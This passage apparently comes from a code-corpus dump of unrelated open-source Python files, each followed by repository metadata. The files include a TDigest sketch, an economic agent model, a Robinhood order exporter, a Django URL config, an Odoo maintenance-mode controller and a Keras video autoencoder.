if isinstance(obj, TDigest):
return (obj.compression, obj.maxDiscrete, obj._cent, obj._mass)
else:
raise TypeError("cannot serialize %r of type %r" % (obj, type(obj)))
def deserialize(self, datum):
return TDigest(datum[0], datum[1], datum[2], datum[3])
class TDigest(object):
"""
A T-Digest sketch of a cumulative numeric distribution.
This is a "read-only" python mirror of org.isarnproject.sketches.java.TDigest which supports
all cdf and sampling methods, but does not currently support update with new data. It is
assumed to have been produced with a t-digest aggregating UDF, also exposed in this package.
"""
# Because this is a value and not a function, TDigestUDT has to be defined above,
# and in the same file.
__UDT__ = TDigestUDT()
def __init__(self, compression, maxDiscrete, cent, mass):
self.compression = float(compression)
self.maxDiscrete = int(maxDiscrete)
assert self.compression > 0.0, "compression must be > 0"
assert self.maxDiscrete >= 0, "maxDiscrete must be >= 0"
self._cent = [float(v) for v in cent]
self._mass = [float(v) for v in mass]
assert len(self._mass) == len(self._cent), "cluster mass and cent must have same dimension"
self.nclusters = len(self._cent)
# Current implementation is "read only" so we can just store cumulative sum here.
# To support updating, 'csum' would need to become a Fenwick tree array
self._csum = list(it.accumulate(self._mass))
def __repr__(self):
return "TDigest(%s, %s, %s, %s)" % \
(repr(self.compression), repr(self.maxDiscrete), repr(self._cent), repr(self._mass))
def mass(self):
"""
Total mass accumulated by this TDigest
"""
if len(self._csum) == 0: return 0.0
return self._csum[-1]
def size(self):
"""
Number of clusters in this TDigest
"""
return len(self._cent)
def isEmpty(self):
"""
Returns True if this TDigest is empty, False otherwise
"""
return len(self._cent) == 0
def __reduce__(self):
return (self.__class__, (self.compression, self.maxDiscrete, self._cent, self._mass, ))
def _lmcovj(self, m):
assert self.nclusters >= 2
assert (m >= 0.0) and (m <= self.mass())
return bisect_left(self._csum, m)
def _rmcovj(self, m):
assert self.nclusters >= 2
assert (m >= 0.0) and (m <= self.mass())
return bisect_right(self._csum, m) - 1
def _rcovj(self, x):
return bisect_right(self._cent, x) - 1
# emulates behavior from isarn java TDigest, which computes
# cumulative sum via a Fenwick tree
def _ftSum(self, j):
if (j < 0): return 0.0
if (j >= self.nclusters): return self.mass()
return self._csum[j]
def cdf(self, xx):
"""
Return CDF(x) of a numeric value x, with respect to this TDigest CDF sketch.
"""
x = float(xx)
j1 = self._rcovj(x)
if (j1 < 0): return 0.0
if (j1 >= self.nclusters - 1): return 1.0
j2 = j1 + 1
c1 = self._cent[j1]
c2 = self._cent[j2]
tm1 = self._mass[j1]
tm2 = self._mass[j2]
s = self._ftSum(j1 - 1)
d1 = 0.0 if (j1 == 0) else tm1 / 2.0
m1 = s + d1
m2 = m1 + (tm1 - d1) + (tm2 if (j2 == self.nclusters - 1) else tm2 / 2.0)
m = m1 + (x - c1) * (m2 - m1) / (c2 - c1)
return min(m2, max(m1, m)) / self.mass()
def cdfInverse(self, qq):
"""
Given a value q on [0,1], return the value x such that CDF(x) = q.
Returns NaN for any q > 1 or < 0, or if this TDigest is empty.
"""
q = float(qq)
if (q < 0.0) or (q > 1.0): return float('nan')
if (self.nclusters == 0): return float('nan')
if (self.nclusters == 1): return self._cent[0]
if (q == 0.0): return self._cent[0]
if (q == 1.0): return self._cent[self.nclusters - 1]
m = q * self.mass()
j1 = self._rmcovj(m)
j2 = j1 + 1
c1 = self._cent[j1]
c2 = self._cent[j2]
tm1 = self._mass[j1]
tm2 = self._mass[j2]
s = self._ftSum(j1 - 1)
d1 = 0.0 if (j1 == 0) else tm1 / 2.0
m1 = s + d1
m2 = m1 + (tm1 - d1) + (tm2 if (j2 == self.nclusters - 1) else tm2 / 2.0)
x = c1 + (m - m1) * (c2 - c1) / (m2 - m1)
return min(c2, max(c1, x))
def cdfDiscrete(self, xx):
"""
        Return CDF(x) for a numeric value x, assuming the sketch represents a
discrete distribution.
"""
x = float(xx)
j = self._rcovj(x)
return self._ftSum(j) / self.mass()
def cdfDiscreteInverse(self, qq):
"""
Given a value q on [0,1], return the value x such that CDF(x) = q, assuming
        the sketch represents a discrete distribution.
Returns NaN for any q > 1 or < 0, or if this TDigest is empty.
"""
q = float(qq)
if (q < 0.0) or (q > 1.0): return float('nan')
if self.nclusters == 0: return float('nan')
if self.nclusters == 1: return self._cent[0]
m = q * self.mass()
j = self._lmcovj(m)
return self._cent[j]
def samplePDF(self):
"""
Return a random sampling from the sketched distribution, using inverse
transform sampling, assuming a continuous distribution.
"""
return self.cdfInverse(random.random())
def samplePMF(self):
"""
Return a random sampling from the sketched distribution, using inverse
transform sampling, assuming a discrete distribution.
"""
return self.cdfDiscreteInverse(random.random())
def sample(self):
"""
Return a random sampling from the sketched distribution, using inverse
transform sampling, assuming a discrete distribution if the number of
TDigest clusters is <= maxDiscrete, and a continuous distribution otherwise.
"""
        if self.nclusters <= self.maxDiscrete:
return self.cdfDiscreteInverse(random.random())
return self.cdfInverse(random.random())
|
apache-2.0
| -8,566,851,161,304,078,000
| 38.981333
| 106
| 0.649503
| false
| 3.575721
| false
| false
| false
|
ntuecon/pubfin
|
economy/agents.py
|
1
|
5147
|
'''
Created on Apr 16, 2018
@author: Hendrik Rommeswinkel
'''
import numpy as np
from scipy.optimize import minimize
from utility import Utility,Profit,GoodFactorUtility,CESUtility
from technology import LinearTechnology
from technology import DRSTechnology
class Agent(object):
'''
An agent contains an objective. When asked to optimize(), the agent maximizes the objective given constraints and bounds on the variables.
'''
def __init__(self, objective=Utility(), env=dict()):
'''
Constructor
'''
self.objective = objective
#Perhaps the env should instead be an argument to optimize()?
#In case an environment is provided, use this environment
self.env = env
#The problemsize needs to be manually rewritten in case it is not equal to 1
self.problemsize = 1
    def optimize(self, bounds=None, constraints=()):
        #The env tells us how large the dimension of the initial guess has to be
        x0 = np.ones(self.problemsize)
        # `list.append` returns None, so the constraints must be concatenated;
        # scipy's minimize also expects `args` to be a tuple.
        opt = minimize(self.objective, x0, args=(self.env,), method='SLSQP', bounds=bounds, constraints=constraints + self.env.get('constraints', ()))
if opt['success']==0:
# If the optimization problem could not be solved, we need to raise an error.
raise ValueError("Optimization problem could not be solved.")
return opt['x']
class Consumer(Agent):
'''
A consumer is an agent who has a utility function as the objective and no internal constraints
Setting env is required as there are both goods and factors to be chosen
Constraints for the consumer need to be supplied by the economy
'''
def __init__(self, objective=Utility(), env=dict()):
'''
Constructor
'''
self.env = {'constraints': (), }
self.env.update(env)
self.problemsize = len(self.env['goods']) + len(self.env['factors'])
self.objective=objective
def consume(self, c, env=dict()):
#We update the env by env keys already in self.env
env.update(self.env)
if not 'transfers' in env:
env['transfers'] = np.zeros(self.problemsize)
print "No transfers found"
return self.objective(c + env['transfers'])
def optimize(self, bounds=None, constraints=(), env=dict()):
x0 = np.ones(self.problemsize)
env.update(self.env)
opt = minimize(self.consume, x0, args=(env,), method='SLSQP', bounds=bounds, constraints=constraints+env['constraints'])
if opt['success']==0:
raise ValueError("Optimization problem could not be solved.")
print opt
return opt['x']
class Producer(Agent):
'''
A producer is an agent who has a technology as a constraint and maximizes payoffs
The economy needs to supply prices
'''
def __init__(self, objective=Profit(), technology=None, env=None):
'''
Constructor
'''
self.objective = objective
        if technology is None:
            technology = DRSTechnology(env)
        self.technology = technology
        self.constraints = [{'type': 'ineq', 'fun': technology}]
#In case an environment is provided, use this environment
self.env = env
self.problemsize = len(self.env['goods']) + len(self.env['factors'])
'''
For a producer, optimization is slightly different since for a linear technology the optimum is not unique.
'''
        if isinstance(self.technology, LinearTechnology):
raise ValueError("No support for linear technologies yet")
else:
pass
class Government(Agent):
'''
The government maximizes a social welfare function. We assume a utilitarian SWF.
'''
def __init__(self, objective, env=None):
'''
Constructor
'''
self.objective = objective
self.constraints = {}
#In case an environment is provided, use this environment
self.env = env
#The problem size for the government is the number of consumers among who to do lump-sum transfers
#We only need to redistribute a single good lump-sum for a well-behaved problem. More generally, we could redistribute all goods lump-sum.
self.problemsize = len(self.env['consumers'])
conradsPreferences = {'scale': -1,
'shift': 0,
'elasticity': -2,
'exponent': .5,
'weights': np.array([2,1,1,1,1])
}
environment = {'goods' : [1,2,3,4,5], 'factors' : [], 'transfers' : np.array([0,.3,0,0,0])}
conrad = Consumer(objective = CESUtility(conradsPreferences), env=environment)
conradsConstraint = ({'type': 'eq',
'fun': lambda x: np.sum(x) - 7},)
result = conrad.optimize(constraints=conradsConstraint)
print result
#results are numerically quite imprecise. In the above example, in principle the consumption of
#goods 2 and 3 should differ only by .3
|
bsd-3-clause
| 151,333,219,942,449,920
| 37.914729
| 146
| 0.608316
| false
| 4.154157
| false
| false
| false
|
otraczyk/gsevol-web
|
bindings/urec.py
|
1
|
1651
|
# -*- coding: utf-8 -*-
"""Bindings related to unrooted recocilation.
Using `fasturec` and `gsevol`.
"""
import tempfile
from collections import defaultdict
from bindings.base import launch
from bindings import gsevol as Gse
from bindings.utils import wrap_in_tempfile
def launch_fasturec(params, timeout=300, stdin=None, *args, **kwargs):
return launch(['lib/fasturec/fasturec'], params, timeout, stdin, *args, **kwargs)
def launch_urec(params, timeout=300, stdin=None, *args, **kwargs):
return launch(['lib/urec/urec'], params, timeout, stdin, *args, **kwargs)
def draw_unrooted(gene, species, cost, options=''):
assert cost in ("DL", "D", "L", "DC", "RF"), "Wrong cost function: %s" % cost
fu_command = ['-g %s' % gene, '-s %s' % species, '-bX%s' % cost]
fu_output = launch_fasturec(fu_command)
fu_out_file = wrap_in_tempfile(fu_output)
# Fasturec and gsevol outputs interfere and damage the picture if it's
# printed to stdout.
tmp = tempfile.NamedTemporaryFile()
gse_command = ['-dSz', '-C arrowlength=0.4;scale=2;outputfile="%s"; %s' % (tmp.name, options)]
Gse.launch(gse_command, stdin=fu_out_file)
gse_output = tmp.read()
return gse_output
def optimal_rootings(gene, species, cost):
"""Generate a list of representations of optimal rootings of a gene tree
    for a given cost function (default=...?).
"""
cost_to_opt = defaultdict(lambda: "a5", {
"DL": "a8",
})
command = ['-g %s' % gene, '-s %s' % species, '-b', '-%s' % cost_to_opt[cost]]
output = launch_urec(command)
rootings = [r.strip() for r in output.strip().split('\n')]
return rootings
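# A minimal usage sketch (hypothetical Newick strings, not part of this
# module):
#
#     gene = "((a,b),(c,d))"
#     species = "((a,b),(c,d))"
#     picture = draw_unrooted(gene, species, "DL")
#     rootings = optimal_rootings(gene, species, "DL")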
|
mit
| -6,543,209,536,789,756,000
| 38.309524
| 98
| 0.651726
| false
| 3.126894
| false
| false
| false
|
codesociety/friartuck
|
friartuck/Robinhood/trade_history_downloader.py
|
1
|
2942
|
"""
MIT License
Copyright (c) 2017 Code Society
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import json
import csv
import shelve
from Robinhood import Robinhood
def get_symbol_from_instrument_url(rb_client, url, db):
    # Cache instrument lookups in the shelve db to avoid repeated API calls
    if url not in db:
        db[url] = fetch_json_by_url(rb_client, url)
    return db[url]['symbol']
def fetch_json_by_url(rb_client, url):
return rb_client.session.get(url).json()
def order_item_info(order, rb_client, db):
#side: .side, price: .average_price, shares: .cumulative_quantity, instrument: .instrument, date : .last_transaction_at
symbol = get_symbol_from_instrument_url(rb_client, order['instrument'], db)
return {
'side': order['side'],
'price': order['average_price'],
'shares': order['cumulative_quantity'],
'symbol': symbol,
'date': order['last_transaction_at'],
'state': order['state']
}
def get_all_history_orders(rb_client):
orders = []
past_orders = rb.order_history()
orders.extend(past_orders['results'])
while past_orders['next']:
print("{} order fetched".format(len(orders)))
next_url = past_orders['next']
past_orders = fetch_json_by_url(rb_client, next_url)
orders.extend(past_orders['results'])
print("{} order fetched".format(len(orders)))
return orders
rb = Robinhood()
# !!!!!! Change the username and password; be careful not to publish this code with real credentials
rb.login(username="name", password="pass")
past_orders = get_all_history_orders(rb)
instruments_db = shelve.open('instruments.db')
orders = [order_item_info(order, rb, instruments_db) for order in past_orders]
keys = ['side', 'symbol', 'shares', 'price', 'date', 'state']
with open('orders.csv', 'w') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(orders)
|
mit
| -2,211,343,214,784,098,300
| 35.320988
| 124
| 0.704623
| false
| 3.757344
| false
| false
| false
|
kevinjqiu/mockingjay
|
mockingjay/matcher.py
|
1
|
2117
|
import abc
import base64
import re
class StringOrPattern(object):
"""
A decorator object that wraps a string or a regex pattern so that it can
be compared against another string either literally or using the pattern.
"""
def __init__(self, subject):
self.subject = subject
def __eq__(self, other_str):
if isinstance(self.subject, re._pattern_type):
return self.subject.search(other_str) is not None
else:
return self.subject == other_str
def __hash__(self):
return self.subject.__hash__()
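# For example (a sketch, not part of the module):
#     StringOrPattern('abc') == 'abc'                 -> True
#     StringOrPattern(re.compile(r'ab+')) == 'xabbz'  -> True (pattern search)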
class Matcher(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def assert_request_matched(self, request):
"""
Assert that the request matched the spec in this matcher object.
"""
class HeaderMatcher(Matcher):
"""
Matcher for the request's header.
:param key: the name of the header
:param value: the value of the header
"""
def __init__(self, key, value):
self.key = key
self.value = StringOrPattern(value)
def assert_request_matched(self, request):
assert request.headers.get(self.key) == self.value
class ContentTypeMatcher(HeaderMatcher):
"""
Matcher for the request's content type
"""
def __init__(self, content_type):
super(ContentTypeMatcher, self).__init__('content-type', content_type)
class BasicAuthUserMatcher(HeaderMatcher):
"""
Matcher for the request's basic auth user
"""
def __init__(self, user, password):
value = "%s:%s" % (user, '' if not password else password)
self.key = 'authorization'
# expect an exact match
# therefore, not wrapping it in StringOrPattern
self.value = 'Basic %s' % base64.b64encode(value)
class BodyMatcher(Matcher):
"""
Matcher for the request body.
:param body: can either be a string or a :class:`_sre.SRE_Pattern`: object
"""
def __init__(self, body):
self.body = StringOrPattern(body)
def assert_request_matched(self, request):
assert request.body == self.body
|
bsd-3-clause
| 7,529,588,538,709,815,000
| 25.4625
| 78
| 0.629192
| false
| 4.094778
| false
| false
| false
|
dougalsutherland/py-sdm
|
sdm/mp_utils.py
|
1
|
5214
|
'''
Some convenience methods for use with multiprocessing.Pool.
'''
from __future__ import division, print_function
from contextlib import contextmanager
import itertools
import multiprocessing as mp
import os
import random
import string
from .utils import strict_map, imap, izip
def _apply(func_args):
func, args = func_args
return func(*args)
### Dummy implementation of (some of) multiprocessing.Pool that doesn't even
### thread (unlike multiprocessing.dummy).
class ImmediateResult(object):
"Duck-type like multiprocessing.pool.MapResult."
def __init__(self, value):
self.value = value
def get(self, timeout=None):
return self.value
def wait(self, timeout=None):
pass
def ready(self):
return True
def successful(self):
return True
class DummyPool(object):
"Duck-type like multiprocessing.Pool, mostly."
def close(self):
pass
def join(self):
pass
def apply_async(self, func, args, kwds=None, callback=None):
val = func(*args, **(kwds or {}))
callback(val)
return ImmediateResult(val)
def map(self, func, args, chunksize=None):
return strict_map(func, args)
def imap(self, func, args, chunksize=None):
return imap(func, args)
def imap_unordered(self, func, args, chunksize=None):
return imap(func, args)
def patch_starmap(pool):
'''
A function that adds the equivalent of multiprocessing.Pool.starmap
to a given pool if it doesn't have the function.
'''
if hasattr(pool, 'starmap'):
return
def starmap(func, iterables):
return pool.map(_apply, izip(itertools.repeat(func), iterables))
pool.starmap = starmap
def make_pool(n_proc=None):
"Makes a multiprocessing.Pool or a DummyPool depending on n_proc."
pool = DummyPool() if n_proc == 1 else mp.Pool(n_proc)
patch_starmap(pool)
return pool
@contextmanager
def get_pool(n_proc=None):
"A context manager that opens a pool and joins it on exit."
pool = make_pool(n_proc)
yield pool
pool.close()
pool.join()
### A helper for letting the forked processes use data without pickling.
_data_name_cands = (
'_data_' + ''.join(random.sample(string.ascii_lowercase, 10))
for _ in itertools.count())
class ForkedData(object):
'''
Class used to pass data to child processes in multiprocessing without
really pickling/unpickling it. Only works on POSIX.
Intended use:
- The master process makes the data somehow, and does e.g.
data = ForkedData(the_value)
- The master makes sure to keep a reference to the ForkedData object
until the children are all done with it, since the global reference
is deleted to avoid memory leaks when the ForkedData object dies.
- Master process constructs a multiprocessing.Pool *after*
the ForkedData construction, so that the forked processes
inherit the new global.
- Master calls e.g. pool.map with data as an argument.
- Child gets the real value through data.value, and uses it read-only.
Modifying it won't crash, but changes won't be propagated back to the
master or to other processes, since it's copy-on-write.
'''
# TODO: more flexible garbage collection options
def __init__(self, val):
g = globals()
self.name = next(n for n in _data_name_cands if n not in g)
g[self.name] = val
self.master_pid = os.getpid()
def __getstate__(self):
if os.name != 'posix':
raise RuntimeError("ForkedData only works on OSes with fork()")
return self.__dict__
@property
def value(self):
return globals()[self.name]
def __del__(self):
if os.getpid() == self.master_pid:
del globals()[self.name]
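# A minimal ForkedData usage sketch (hypothetical names, not part of this
# module):
#
#     data = ForkedData(load_big_array())  # keep this reference alive
#     with get_pool(4) as pool:
#         results = pool.starmap(child_func, [(data, i) for i in range(10)])
#
# where child_func reads data.value read-only and the array is never pickled.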
### Progress-bar handling with multiprocessing pools
def progress(counter=True, **kwargs):
import progressbar as pb
try:
widgets = kwargs.pop('widgets')
except KeyError:
# TODO: make work when maxval is unknown
if counter:
class CommaProgress(pb.Widget):
def update(self, pbar):
return '{:,} of {:,}'.format(pbar.currval, pbar.maxval)
widgets = [' ', CommaProgress(), ' (', pb.Percentage(), ') ']
else:
widgets = [' ', pb.Percentage(), ' ']
widgets.extend([pb.Bar(), ' ', pb.ETA()])
return pb.ProgressBar(widgets=widgets, **kwargs)
def progressbar_and_updater(*args, **kwargs):
pbar = progress(*args, **kwargs).start()
counter = itertools.count(1)
def update_pbar():
pbar.update(next(counter))
# race conditions mean the pbar might be updated backwards on
# occasion, but the highest count ever seen will be right.
return pbar, update_pbar
def map_unordered_with_progressbar(pool, func, jobs):
pbar, tick_pbar = progressbar_and_updater(maxval=len(jobs))
callback = lambda result: tick_pbar()
results = [pool.apply_async(func, job, callback=callback) for job in jobs]
values = [r.get() for r in results]
pbar.finish()
return values
|
bsd-3-clause
| 6,525,598,132,934,458,000
| 29.138728
| 79
| 0.641158
| false
| 3.929164
| false
| false
| false
|
DjangoQuilla/temii
|
votos/urls.py
|
2
|
1862
|
"""votos URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth.views import logout
from apps.votos.views import (
ListarEstadoView, ListarAgendadoView, ListarFinalizadoView,
RegistrarCharlaView, DetalleCharlaView, ListarFaqView
)
from apps.votos.views import VotoView, login
urlpatterns = [
url(r'^$', ListarEstadoView.as_view(), name='index'),
url(r'^agendado$', ListarAgendadoView.as_view(), name='agendado'),
url(r'^finalizado$', ListarFinalizadoView.as_view(), name='finalizado'),
url(r'^faq$', ListarFaqView.as_view(), name='faq'),
url(r'^admin/', include(admin.site.urls)),
url(r'^registrar_charla$',
RegistrarCharlaView.as_view(),
name='registrar_charla'),
url(r'^votar/(?P<charla>\d+)$', VotoView.as_view(), name='votar'),
url(r'^posible-charla/(?P<pk>\d+)$',
DetalleCharlaView.as_view(),
name='detalle_charla'),
# Python Social Auth URLs
# url('', include('social.apps.django_app.urls', namespace='social')),
url(r'^oauth/', include('social_django.urls', namespace='social')),
url(r'^login', login, name="login"),
url(r'^users/logout/$', logout,
{'next_page': '/'},
name="user-logout"),
]
|
apache-2.0
| 9,124,189,688,081,066,000
| 37
| 77
| 0.668099
| false
| 3.210345
| false
| false
| false
|
shingonoide/odoo_ezdoo
|
addons/website_maintenance/controllers/main.py
|
1
|
2661
|
import logging
from openerp.http import request
import werkzeug
from openerp.addons.web import http
from openerp.addons.website.controllers.main import Website
logger = logging.getLogger(__name__)
class WebsiteMaintenance(Website):
def is_maintenance_mode(self):
is_on = ['on', '1', 'true', 'yes']
maintenance_mode = request.registry['ir.config_parameter'].get_param(
request.cr, request.uid, 'website.maintenance_mode')
logger.debug("maintenance_mode value: %s" % (maintenance_mode))
if maintenance_mode in is_on:
logger.info("Maintenance mode on")
if not request.uid:
logger.info("Not uid, request auth public")
self._auth_method_public()
ir_model = request.env['ir.model.data'].sudo()
allowed_group = ir_model.get_object('base',
'group_website_designer')
if allowed_group in request.env.user.groups_id:
logger.info("Maintenance mode off for user_id: %s" %
(request.env.user.id))
return
code = 503
status_message = request.registry['ir.config_parameter'].get_param(
request.cr, request.uid, 'website.maintenance_message',
"We're maintenance now")
values = {
'status_message': status_message,
'status_code': code,
'company_email': request.env.user.company_id.email
}
logger.debug(values)
try:
html = request.website._render('website_maintenance.%s' %
code, values)
except Exception:
html = request.website._render('website.http_error', values)
        return werkzeug.wrappers.Response(html, status=code,
                                          content_type='text/html;charset=utf-8')
@http.route('/', type='http', auth="public", website=True)
def index(self, **kw):
is_maintenance_mode = self.is_maintenance_mode()
if not is_maintenance_mode:
return super(WebsiteMaintenance, self).index()
else:
return is_maintenance_mode
@http.route('/page/<page:page>', type='http', auth="public", website=True)
def page(self, page, **opts):
is_maintenance_mode = self.is_maintenance_mode()
if not is_maintenance_mode:
return super(WebsiteMaintenance, self).page(page)
else:
return is_maintenance_mode
|
agpl-3.0
| -3,009,250,158,980,615,000
| 38.716418
| 79
| 0.550169
| false
| 4.435
| false
| false
| false
|
Belxjander/Kirito
|
SnowStorm/indra/fix-incredibuild.py
|
1
|
2220
|
#!/usr/bin/env python
##
## $LicenseInfo:firstyear=2011&license=viewerlgpl$
## Second Life Viewer Source Code
## Copyright (C) 2011, Linden Research, Inc.
##
## This library is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation;
## version 2.1 of the License only.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this library; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
##
## Linden Research, Inc., 945 Battery Street, San Francisco, CA 94111 USA
## $/LicenseInfo$
import sys
import os
import glob
def delete_file_types(path, filetypes):
if os.path.exists(path):
print 'Cleaning: ' + path
        orig_dir = os.getcwd()
os.chdir(path)
filelist = []
for type in filetypes:
filelist.extend(glob.glob(type))
for file in filelist:
os.remove(file)
os.chdir(orig_dir)
def main():
build_types = ['*.exp','*.exe','*.pdb','*.idb',
'*.ilk','*.lib','*.obj','*.ib_pdb_index']
pch_types = ['*.pch']
delete_file_types("build-vc80/newview/Release", build_types)
delete_file_types("build-vc80/newview/secondlife-bin.dir/Release/",
pch_types)
delete_file_types("build-vc80/newview/RelWithDebInfo", build_types)
delete_file_types("build-vc80/newview/secondlife-bin.dir/RelWithDebInfo/",
pch_types)
delete_file_types("build-vc80/newview/Debug", build_types)
delete_file_types("build-vc80/newview/secondlife-bin.dir/Debug/",
pch_types)
delete_file_types("build-vc80/test/RelWithDebInfo", build_types)
delete_file_types("build-vc80/test/test.dir/RelWithDebInfo/",
pch_types)
if __name__ == "__main__":
main()
|
gpl-3.0
| 4,947,040,908,959,312,000
| 35.393443
| 81
| 0.651351
| false
| 3.529412
| false
| false
| false
|
pratikgujjar/DeepIntent
|
code/autoencoder_model/scripts/ds_autoencoder.py
|
1
|
15225
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hickle as hkl
import numpy as np
np.random.seed(2 ** 10)
from keras import backend as K
K.set_image_dim_ordering('tf')
from keras.layers import Dropout
from keras.models import Sequential
from keras.layers.core import Activation
from keras.utils.vis_utils import plot_model
from keras.layers.wrappers import TimeDistributed
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import Conv2DTranspose
from keras.layers.convolutional import Conv3D
from keras.layers.convolutional import Conv3DTranspose
from keras.layers.convolutional_recurrent import ConvLSTM2D
from keras.layers.normalization import BatchNormalization
from keras.layers.core import Reshape
from keras.callbacks import LearningRateScheduler
from keras.layers.advanced_activations import LeakyReLU
from config_ds import *
import tb_callback
import lrs_callback
import argparse
import math
import os
import cv2
from sys import stdout
def encoder_model():
model = Sequential()
# 10x64x64
model.add(Conv3D(filters=256,
strides=(1, 2, 2),
kernel_size=(3, 11, 11),
padding='same',
input_shape=(int(VIDEO_LENGTH/2), 64, 64, 1)))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x32x32
# model.add(Conv3D(filters=128,
# strides=(1, 2, 2),
# kernel_size=(3, 5, 5),
# padding='same'))
# model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
# model.add(TimeDistributed(Dropout(0.5)))
# 10x32x32
model.add(Conv3D(filters=128,
strides=(1, 2, 2),
kernel_size=(3, 5, 5),
padding='same'))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
return model
def decoder_model():
model = Sequential()
# 10x32x32
model.add(Conv3DTranspose(filters=64,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 1, 1),
input_shape=(10, 16, 16, 128)))
model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(Activation('relu')))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x64x64
model.add(Conv3DTranspose(filters=128,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 2, 2)))
model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(Activation('relu')))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x64x64
model.add(Conv3DTranspose(filters=64,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 2, 2)))
model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(Activation('relu')))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x128x128
model.add(Conv3DTranspose(filters=1,
kernel_size=(3, 5, 5),
strides=(1, 1, 1),
padding='same'))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(Activation('tanh')))
model.add(TimeDistributed(Dropout(0.5)))
return model
def set_trainability(model, trainable):
model.trainable = trainable
for layer in model.layers:
layer.trainable = trainable
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
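# Shape flow through the combined model, for reference:
#     input   -> (batch, 10, 64, 64, 1)
#     encoder -> (batch, 10, 16, 16, 128)
#     decoder -> (batch, 10, 64, 64, 1)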
def combine_images(X, y, generated_images):
# Unroll all generated video frames
n_frames = generated_images.shape[0] * generated_images.shape[1]
frames = np.zeros((n_frames,) + generated_images.shape[2:], dtype=generated_images.dtype)
frame_index = 0
for i in range(generated_images.shape[0]):
for j in range(generated_images.shape[1]):
frames[frame_index] = generated_images[i, j]
frame_index += 1
num = frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = frames.shape[1:]
image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=generated_images.dtype)
for index, img in enumerate(frames):
i = int(index / width)
j = index % width
image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
n_frames = X.shape[0] * X.shape[1]
orig_frames = np.zeros((n_frames,) + X.shape[2:], dtype=X.dtype)
# Original frames
frame_index = 0
for i in range(X.shape[0]):
for j in range(X.shape[1]):
orig_frames[frame_index] = X[i, j]
frame_index += 1
num = orig_frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = orig_frames.shape[1:]
orig_image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=X.dtype)
for index, img in enumerate(orig_frames):
i = int(index / width)
j = index % width
orig_image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
# Ground truth
truth_frames = np.zeros((n_frames,) + y.shape[2:], dtype=y.dtype)
frame_index = 0
for i in range(y.shape[0]):
for j in range(y.shape[1]):
truth_frames[frame_index] = y[i, j]
frame_index += 1
num = truth_frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = truth_frames.shape[1:]
truth_image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=y.dtype)
for index, img in enumerate(truth_frames):
i = int(index / width)
j = index % width
truth_image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
return orig_image, truth_image, image
def load_weights(weights_file, model):
model.load_weights(weights_file)
def run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS):
